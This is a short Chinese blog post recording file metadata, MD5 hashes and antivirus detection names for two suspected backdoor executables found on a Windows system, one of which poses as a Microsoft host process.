语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2005-6-16 9:16:18
修改时间 : 2005-6-17 9:52:46
访问时间 : 2005-12-31 0:0:0
大小 : 238592 字节 233.0 KB
MD5 : 770b4742df5ebecec131738e30cc872a

Kaspersky 报为 Backdoor.Win32.Delf.ash

文件说明符 : C:/WINDOWS/system32/dgd4bs.exe
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-6-20 23:30:23
修改时间 : 2005-12-30 21:3:56
访问时间 : 2007-6-20 0:0:0
大小 : 26392 字节 25.792 KB
MD5 : 25661ee9d11123cae992a1135cccc0ca

Kaspersky 报为 Backdoor.Win32.Agent.ahj,瑞星报为 Trojan.DL.Win32.VB.a

标签:lg,12,文件,WINDOWS,30,Win32,Backdoor,exe,2005
From: https://blog.51cto.com/endurer/5881541

相关文章